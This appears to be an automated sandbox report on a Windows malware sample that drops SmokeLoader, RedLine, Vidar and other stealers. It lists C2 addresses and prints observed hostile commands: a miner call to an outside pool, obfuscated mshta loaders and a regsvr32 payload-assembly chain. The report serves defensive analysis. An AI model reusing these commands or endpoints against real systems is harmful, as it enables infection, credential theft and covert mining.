Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    399s
  • max time network
    531s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    08-07-2021 12:14

General

  • Target

    toolspab2 (12).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Seryi

C2

185.203.243.131:27365

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    824

Extracted

Family

vidar

Version

39.4

Botnet

517

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    517

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 4 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 38 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 7 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 57 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 25 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {74E5B183-7280-4A3F-8B1D-32A6E4248A37} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:4648
        • C:\Windows\SysWOW64\ppnzolrl\ickoypqz.exe
          C:\Windows\SysWOW64\ppnzolrl\ickoypqz.exe /d"C:\Users\Admin\AppData\Local\Temp\3ACE.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:2536
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            3⤵
            • Drops file in System32 directory
            PID:2904
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
              4⤵
                PID:3096
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:680
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
              PID:3760
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
                PID:2856
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                  PID:2556
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                    PID:4552
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                    2⤵
                      PID:3320
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                        PID:3848
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                        2⤵
                          PID:4256
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                            PID:3748
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                              PID:1328
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                                PID:3876
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                  PID:2840
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                  2⤵
                                    PID:3012
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                    2⤵
                                      PID:952
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                        PID:1684
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                        2⤵
                                          PID:3336
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          2⤵
                                            PID:572
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                            2⤵
                                              PID:3552
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                              2⤵
                                                PID:3028
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                2⤵
                                                  PID:4740
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                  2⤵
                                                    PID:4784
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                    2⤵
                                                      PID:4924
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                      2⤵
                                                        PID:4756
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                        2⤵
                                                          PID:4840
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                          2⤵
                                                            PID:4916
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                            2⤵
                                                              PID:4872
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                              2⤵
                                                                PID:4960
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                2⤵
                                                                  PID:3452
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                  2⤵
                                                                    PID:796
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                    2⤵
                                                                      PID:3736
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                        PID:2372
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                        2⤵
                                                                          PID:3500
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                          2⤵
                                                                            PID:3284
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                            2⤵
                                                                              PID:5036
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                              2⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                  PID:4080
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  2⤵
                                                                                    PID:4328
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                    2⤵
                                                                                      PID:4732
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                      2⤵
                                                                                        PID:3520
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                          PID:5084
                                                                                      • C:\Users\Admin\AppData\Local\Temp\toolspab2 (12).exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\toolspab2 (12).exe"
                                                                                        1⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:320
                                                                                        • C:\Users\Admin\AppData\Local\Temp\toolspab2 (12).exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\toolspab2 (12).exe"
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:860
                                                                                      • C:\Users\Admin\AppData\Local\Temp\74E2.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\74E2.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:456
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7669.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7669.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:1432
                                                                                      • C:\Users\Admin\AppData\Local\Temp\CCC3.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\CCC3.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1240
                                                                                        • C:\Users\Admin\AppData\Local\Temp\CCC3.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\CCC3.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2036
                                                                                      • C:\Users\Admin\AppData\Local\Temp\D32A.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\D32A.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1940
                                                                                      • C:\Users\Admin\AppData\Local\Temp\D6A4.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\D6A4.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:984
                                                                                      • C:\Users\Admin\AppData\Local\Temp\E565.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\E565.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Modifies system certificate store
                                                                                        PID:796
                                                                                      • C:\Users\Admin\AppData\Local\Temp\EDDE.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\EDDE.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1924
                                                                                      • C:\Users\Admin\AppData\Local\Temp\F954.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\F954.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:324
                                                                                      • C:\Users\Admin\AppData\Local\Temp\BCC.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\BCC.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:864
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:2040
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                            PID:920
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1856
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:760
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1540
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:320
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1620
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1252
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:940
                                                                                            • C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1848
                                                                                              • C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Adds Run key to start application
                                                                                                PID:884
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "C:\Users\Admin\AppData\Local\a315b2bb-d58a-48c7-aa90-1d82113a19a3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                  3⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:1256
                                                                                                • C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\C9CE.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:2132
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C9CE.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C9CE.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:2584
                                                                                                    • C:\Users\Admin\AppData\Local\af3eebf4-e56c-4a99-a411-492bad5ed88a\build2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\af3eebf4-e56c-4a99-a411-492bad5ed88a\build2.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:2760
                                                                                                      • C:\Users\Admin\AppData\Local\af3eebf4-e56c-4a99-a411-492bad5ed88a\build2.exe
                                                                                                        "C:\Users\Admin\AppData\Local\af3eebf4-e56c-4a99-a411-492bad5ed88a\build2.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks processor information in registry
                                                                                                        PID:2272
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\af3eebf4-e56c-4a99-a411-492bad5ed88a\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          7⤵
                                                                                                            PID:2112
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im build2.exe /f
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:1656
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              8⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:2084
                                                                                              • C:\Users\Admin\AppData\Local\Temp\CAD8.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\CAD8.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks processor information in registry
                                                                                                PID:1476
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im CAD8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CAD8.exe" & del C:\ProgramData\*.dll & exit
                                                                                                  2⤵
                                                                                                    PID:2340
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im CAD8.exe /f
                                                                                                      3⤵
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2388
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /t 6
                                                                                                      3⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:2496
                                                                                                • C:\Users\Admin\AppData\Local\Temp\D564.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\D564.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1604
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\D564.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\D564.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                    2⤵
                                                                                                      PID:844
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\D564.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\D564.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                        3⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:1940
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                          ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1648
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                            5⤵
                                                                                                              PID:928
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                6⤵
                                                                                                                  PID:932
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                5⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:1848
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                  6⤵
                                                                                                                    PID:1160
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                      7⤵
                                                                                                                        PID:516
                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                        regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                        7⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                        PID:1888
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                        7⤵
                                                                                                                          PID:1712
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill -F -im "D564.exe"
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1700
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E52D.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\E52D.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1744
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 184
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Program crash
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1332
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ECBD.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\ECBD.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:1564
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-1NV1J.tmp\ECBD.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-1NV1J.tmp\ECBD.tmp" /SL5="$101F8,188175,104448,C:\Users\Admin\AppData\Local\Temp\ECBD.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:860
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VA495.tmp\134 Vaporeondè_éçè_)))_.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VA495.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                  3⤵
                                                                                                                  • Drops file in Drivers directory
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:1980
                                                                                                                  • C:\Program Files\Windows Journal\QHWMLLLPNS\irecord.exe
                                                                                                                    "C:\Program Files\Windows Journal\QHWMLLLPNS\irecord.exe" /VERYSILENT
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:3024
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DD7G2.tmp\irecord.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-DD7G2.tmp\irecord.tmp" /SL5="$801A2,5808768,66560,C:\Program Files\Windows Journal\QHWMLLLPNS\irecord.exe" /VERYSILENT
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      PID:3064
                                                                                                                      • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2108
